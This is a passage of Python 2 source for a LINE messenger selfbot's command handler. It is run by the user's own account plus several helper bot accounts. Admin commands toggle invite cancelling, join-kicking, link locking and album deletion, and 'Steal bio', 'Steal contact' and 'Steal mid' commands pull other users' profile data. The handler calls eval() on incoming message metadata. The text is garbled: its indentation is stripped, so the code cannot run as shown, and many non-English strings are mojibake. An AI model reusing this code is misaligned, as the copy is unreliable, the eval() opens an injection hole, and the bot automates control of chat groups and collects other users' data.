except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'music ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('music ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[3])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'clean invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting。")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#================================================================================
elif 'clear invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif 'link open' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#===========================================================================
elif 'link close' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#============================================================
elif msg.text.lower() == 'ginfo':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[display name]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nmembers:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
#===============================================================
elif 'group list' in msg.text.lower():
if msg.from_ in admin:
gs = cl.getGroupIdsJoined()
L = "『 Groups List 』\n"
for i in gs:
L += "[≫] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif "Invite me" in msg.text:
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(i,[msg.from_])
cl.sendText(msg.to, "successfully invited you to all groups")
elif "Steal group pict" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Turn off bots" in msg.text:
if msg.from_ in owner:
try:
import sys
sys.exit()
except:
pass
#==================================================================
elif "Steal bio" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,contact.statusMessage)
except:
cl.sendText(msg.to,contact.statusMessage)
#===========================================================
#=======================================================
elif "T-eng " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-eng ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'en')
cl.sendText(msg.to,trs)
print '[Command] Translate EN'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-japan " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-japan ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'ja')
cl.sendText(msg.to,trs)
print '[Command] Translate japan'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-thai " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-thai ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'th')
cl.sendText(msg.to,trs)
print '[Command] Translate thai'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-id " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-id ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'id')
cl.sendText(msg.to,trs)
print '[Command] Translate ID'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Say " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Say ","")
cl.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
ks.sendText(msg.to,(bctxt))
#==========================================================================
elif msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Boss")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
if "Mode on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
wait['pname'][msg.to] = cl.getGroup(msg.to).name
if "Mode on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
#==========================================================================
elif msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
if "Mode off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
if "Mode off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
#==========================================================================
elif msg.text in ["Protect:hight","protect:hight"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:off","auto blockqr:off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:on","auto blockqr:on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Protect:low","Protect:low"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Namelock:on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
wait['pname'][msg.to] = cl.getGroup(msg.to).name
elif "Namelock:off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
elif "Blockinvite:on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
elif "Blockinvite:off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
#============================================================
elif msg.text in ["Undang"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
#============================================================
elif "Steal mid" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Steal contact" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)#=================
elif msg.text in ["Mc "]:
if msg.from_ in admin:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text in ["Joinn on","joinn on"]:
if msg.from_ in admin:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Joinn off","joinn off"]:
if msg.from_ in admin:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel on","cancel on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel off","cancel off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr on","qr on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr off","qr off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact On","Contact on","contact on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact Off","Contact off","contact off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オン","Join on","Auto join on","自動å�ƒåŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オフ","Join off","Auto join off","自動å�ƒåŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Gcancel:"]:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒ç»�。è¦�时开请指定人æ���°å�‘é€�")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的å°�组ç���¨è‡ªåŠ¨é‚€è¯·æ���’ç»�")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["強制自動退出:オン","Leave on","Auto leave:on","強制自動退出:開"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["強制自動退出:オフ","Leave off","Auto leave:off","強制自��‹•退出ï¼��é—œ"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["共有:オン","Share on","Share on"]:
if msg.from_ in admin:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["å���±æœ‰:オフ","Share off","Share off"]:
if msg.from_ in admin:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Status","status"]:
if msg.from_ in admin:
md = "⭐Status Proteksi⭐\n*============*\n"
if wait["Protectgr"] == True: md+="[•]Protect QR [On]\n"
else: md+="[•]Protect QR [Off]\n"
if wait["Protectcancl"] == True: md+="[•]Protect Invite [On]\n"
else: md+="[•]Protect Invite [Off]\n"
if wait["contact"] == True: md+="[•]Contact [On]\n"
else: md+="[•]Contact [Off]\n"
if wait["autoJoin"] == True: md+="[•]Auto Join [On]\n"
else: md +="[•]Auto Join [Off]\n"
if wait["autoCancel"]["on"] == True:md+="[•]Group Cancel " + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "[•]Group Cancel [Off]\n"
if wait["leaveRoom"] == True: md+="[•]Auto Leave [On]\n"
else: md+="[•]Auto Leave [Off]\n"
if wait["timeline"] == True: md+="[•]Share [On]\n"
else:md+="[•]Share [Off]\n"
if wait["autoAdd"] == True: md+="[•]Auto Add [On]\n"
else:md+="[•]Auto Add [Off]\n"
if wait["Backup"] == True: md+="[•]Backup : on\n"
else:md+="[•]Backup : off\n"
if wait["qr"] == True: md+="[•]AutoBlock QR : on\n"
else:md+="[•]AutoBlock QR : off\n"
if wait["commentOn"] == True: md+="[•]Comment [On]\n"
else:md+="[•]Comment [Off]\n"
if wait["protectionOn"] == True: md+="[•]Protection : hight\n"+ datetime.today().strftime('%H:%M:%S')
else:md+="[•]Protection : low\n"+ datetime.today().strftime('%H:%M:%S')
"\n*============*\n⭐✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰⭐\n*============*"
cl.sendText(msg.to,md)
elif "Time" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
elif "album merit " in msg.text:
gid = msg.text.replace("album merit ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的ç���¸å†Œ"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
cl.sendText(msg.to,mg)
elif "album " in msg.text:
gid = msg.text.replace("album ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
elif "album remove " in msg.text:
gid = msg.text.replace("album remove ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Deleted albums")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["Group id"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:\n%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text in ["Cancelall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"拒�了全部的邀请。")
elif "album removeat’" in msg.text:
gid = msg.text.replace("album removeat’","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Albums deleted")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オン","Add on","Auto add:on","è‡ªå‹•è¿½åŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"Done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オフ","Add off","Auto add:off","è‡ªå‹•è¿½åŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif "Message change: " in msg.text:
wait["message"] = msg.text.replace("Message change: ","")
cl.sendText(msg.to,"message changed")
elif "Message add: " in msg.text:
wait["message"] = msg.text.replace("Message add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed")
else:
cl.sendText(msg.to,"done。")
elif msg.text in ["Message","è‡ªå‹•è¿½åŠ å•�候語確èª�"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"message changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
#-----------------------------------------------
elif msg.text in ["Backup:on"]:
if msg.from_ in admin:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off"]:
if msg.from_ in admin:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Rejectall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
#---------------------Sc invite owner ke group------
elif "Asupka: " in msg.text:
if msg.from_ in owner:
gid = msg.text.replace("Asupka: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#--------===---====--------------
elif msg.text in ["コメント:オン","Comment on","Comment:on","自動首é �留言:開"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
